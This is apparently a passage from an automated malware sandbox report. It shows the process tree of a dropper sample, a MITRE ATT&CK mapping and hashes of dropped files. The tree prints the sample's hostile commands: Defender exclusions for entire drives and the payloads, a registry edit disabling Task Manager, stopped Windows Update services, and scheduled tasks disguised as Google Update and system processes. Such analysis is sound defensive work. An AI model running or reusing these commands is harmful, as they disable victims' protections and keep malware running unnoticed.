  PID:856
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {D083B369-6300-467A-9B63-24D1AA2A3758} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    - Loads dropped DLL
    PID:1548
  - - C:\Program Files\Google\Chrome\updater.exe
      "C:\Program Files\Google\Chrome\updater.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Drops file in Program Files directory
      PID:2268
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:964
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:112
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:1056
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1064
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1172
- C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
  2⤵
  PID:1500
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:2496
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:2132

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:492

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:500

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1152
- C:\Users\Admin\AppData\Local\Temp\b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
  "C:\Users\Admin\AppData\Local\Temp\b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1620
- - C:\Users\Admin\AppData\Local\Temp\Astral private DLL.exe
    "C:\Users\Admin\AppData\Local\Temp\Astral private DLL.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1144
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\containerperf\mtmIdTw4RygS3trJMnWvLFqF6dzRpLwhZvwqEPqaKDGsnR5lufKuCs3iyL.vbe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2488
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\containerperf\OHYKCXOXzFm1PCyBPS6uXfmto4OWxv9XE4FGIVj.bat" "
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2848
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        6⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:2832
      - C:\containerperf\ServerComponenthostMonitorDll.exe
        
        "C:\containerperf/ServerComponenthostMonitorDll.exe"
        6⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2792
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\20pygkq1\20pygkq1.cmdline"
        7⤵
        Drops file in System32 directory
        Suspicious use of WriteProcessMemory
        
        PID:2940
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9A4C.tmp" "c:\Windows\System32\CSC6C0CDF6D93574EA6B8D254562C487071.TMP"
        8⤵
        
        PID:2736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/containerperf/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1096
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Start Menu\Idle.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\dwm.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\csrss.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\Skins\dwm.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\cmd.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\containerperf\ServerComponenthostMonitorDll.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:928
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\w4jg9UHKZb.bat"
        7⤵
        
        PID:2600
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:2268
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        8⤵
        
        PID:1584
        
        C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\csrss.exe
        
        "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\csrss.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2692
- - C:\Users\Admin\AppData\Local\Temp\twain_32.exe
    "C:\Users\Admin\AppData\Local\Temp\twain_32.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    PID:1100
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:928
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:2968
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2368
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1664
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1648
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1472
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2980
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:2432
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2716
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2168
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2608
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1012
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:2224
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3052
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:1212
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:3004
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:1800
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2920
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1192
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2052
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2328
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2136
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1460
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:1904
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:2712
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:992
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:1796
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:668
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  PID:2880
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3048
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:2916
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Modifies data under HKEY_USERS
  PID:2104

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\Start Menu\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Admin\Start Menu\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2956

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Start Menu\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1560

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2236

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2456

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1360

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Media Player\Skins\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\Skins\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:536

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Media Player\Skins\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:696

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:620

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2620

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ServerComponenthostMonitorDllS" /sc MINUTE /mo 11 /tr "'C:\containerperf\ServerComponenthostMonitorDll.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1124

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ServerComponenthostMonitorDll" /sc ONLOGON /tr "'C:\containerperf\ServerComponenthostMonitorDll.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ServerComponenthostMonitorDllS" /sc MINUTE /mo 5 /tr "'C:\containerperf\ServerComponenthostMonitorDll.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2176

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-19058865701493663021-12081140351174390759128592017-11285474420546785301940061876"
1⤵
PID:2436

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-7570025791161529286-1475278647666258554935884471-563690228-1644037547-591536206"
1⤵
PID:1652

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1424250043142899817-20301050901361418704-1968130649900195453-1349712170-1447575325"
1⤵
PID:2900

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "645096561-209452818192235279342297708880698833216380623-1318745360-233645567"
1⤵
PID:2404

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1846287844-1109795704-14599919506853685562080774486817865225-2116804930-459134105"
1⤵
PID:1912

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "369446486-1600935480-12684484811175261862-1570515250-949470863-472082138-1712946762"
1⤵
PID:2512

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-8911842391587871988-32154817-2619824669597655753700195931349919491-5206801"
1⤵
PID:3044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES9A4C.tmp

Filesize
1KB

MD5
f4a03aab8fa16f2b59655b47c99fb238

SHA1
c2185182f7c95b7ed5fbb2372aff8acbf91ef13e

SHA256
f40d6ed9f1187e50fe325040358d32a0ab2a9af544dd02d9599e5146f1786852

SHA512
7d4ef99b480c36f055b24a18bf65df5edf634177d564981274266cf99a1d0a0d0324c219e826ad0d2c1264cf0e91f9f1fc9745ffa5282176aab173980e282c97

Download Submit
C:\Users\Admin\AppData\Local\Temp\twain_32.exe

Filesize
5.7MB

MD5
1ff26b7d334cd22e726caf72a4208b96

SHA1
d2a1ad17e27c01072ac41d4d20426dd5ca7554ad

SHA256
56ece6be060502193ed0360a8ff7d0633dc7e88d133b28b8a73dfb755d2134db

SHA512
787b02b048dad824dd216a0b33872b2012fc8b2c47d831a33c4eb05399df9a253bd30a8789659a7da0eea8535bb78705685ac67ae546d2f10210c7ba552b4f49

Download Submit
C:\Users\Admin\AppData\Local\Temp\w4jg9UHKZb.bat

Filesize
248B

MD5
f0edcd47d0ffd849c677c7fb1151954c

SHA1
6d58223b9cab8cb8779c804669a5f5d99c730d81

SHA256
dc5d1c04f39bbe0845adb8d0395516ddc16adc901a655ec6af0113411c180242

SHA512
f9abba92880e9d59aaa53c756ada6df866a22459a4cee00281323533185f8f30c24800fe65f46c0d34761458e125efe6651ac90d3e11397e7ec4fd78a426733d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
06875349de858922240514e7609ae6e6

SHA1
aa73658e7c22d85ba83077d1fc6df88eb33bc452

SHA256
2cb6db9a2c475d528df9d74473a54aab4b8003bb1683816df5abf52c7a737dc9

SHA512
cb52c6445a7d5b0868fdfe84d2bb8f86e5431fb3a21ca90a8ffa67d1b0b2076ae1b041496a54dbfbd6c1a2557d0e6bab2ef88ff447f98ed050478c2a7c49c891

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
e30ca820170f440c10a7099e004be1ec

SHA1
ce9632813903b55368eeb926f1bd888248b665fb

SHA256
d8b695fdfd5427184f932a40f543672f8dda63d5b993e470e464037c2c4ee12c

SHA512
425f67d9943e3a2ef563867988a70e6c046f30be0ceb684a5de3827884661d8a09619e22622f76d444694296b64381e9d60f5fea62a13a477ac345a493c4a5b8

Download Submit
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC

Filesize
3KB

MD5
12ef1b5ba9f158fcceb4a75da9eb050d

SHA1
0bb8fb0fa94d9187a8ec975a3d67a3eb8e2e45e1

SHA256
ff93f3fa6deddd637d0fc132e8b9f1c64f7ee278f1448bdc6252f83d4f15a8fe

SHA512
e06c2122dacb16a9aa2d04c5ec0473169d1a1c08a85492c9ca8d4ead0bd5226bc37162897d1300f4281e1f2ef372e362686caa8f87b505770caa9d8ba01b7e52

Download Submit
C:\containerperf\OHYKCXOXzFm1PCyBPS6uXfmto4OWxv9XE4FGIVj.bat

Filesize
200B

MD5
705bbadbf818277ddd38afa10533756b

SHA1
1d5fb39c2793854e8c7d848798e39c659aa3e22d

SHA256
871ef6a27bc10a920ce0890b50bf9926b7dbd4eea19a97a19bb837be7a97e5f3

SHA512
f8c46c4e4e31445a397af9f437b86b15edd48047c24f9c78f0e49efa28ea293465cb7aef242e71b2d127deba3827aee8f00c7cc11085f8c05a771b1cfbf36c31

Download Submit
C:\containerperf\mtmIdTw4RygS3trJMnWvLFqF6dzRpLwhZvwqEPqaKDGsnR5lufKuCs3iyL.vbe

Filesize
230B

MD5
3ef9810ceb57153ab80dd204f33e7f91

SHA1
3fd4057ecad16cf11f2cab6d0ad44be3bd4b0e3f

SHA256
d88a8b553f99f796c80a9e7cc41534b43fab45c7b13fd1d52c9b580d541a272e

SHA512
e65cad2c807bf012d13842dac72bd2436d182702fc7bb7fb212487b322a9442504a7c1f42df57e760ac24c322b810ba8c2ffa616dd2acdfb8098bdb5e8012fe9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\20pygkq1\20pygkq1.0.cs

Filesize
366B

MD5
df225b6690d5a41802ed54ed98bbf799

SHA1
637672be7b4c0982483892b02995ade9d9b4dfd7

SHA256
1ad82572a1c47452a8b6d7c784480ed4d9ed6cef126dddbe9109b9e7cc204fc3

SHA512
44bc2f7f1be9cebbea5b1e1dd46be323696b7adc68da8abddfb996d9b37e5bd8610c2375539fd3c23771b4618f2f56963d5bbf35b3e9cfe6aa654d8ccda64891

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\20pygkq1\20pygkq1.cmdline

Filesize
235B

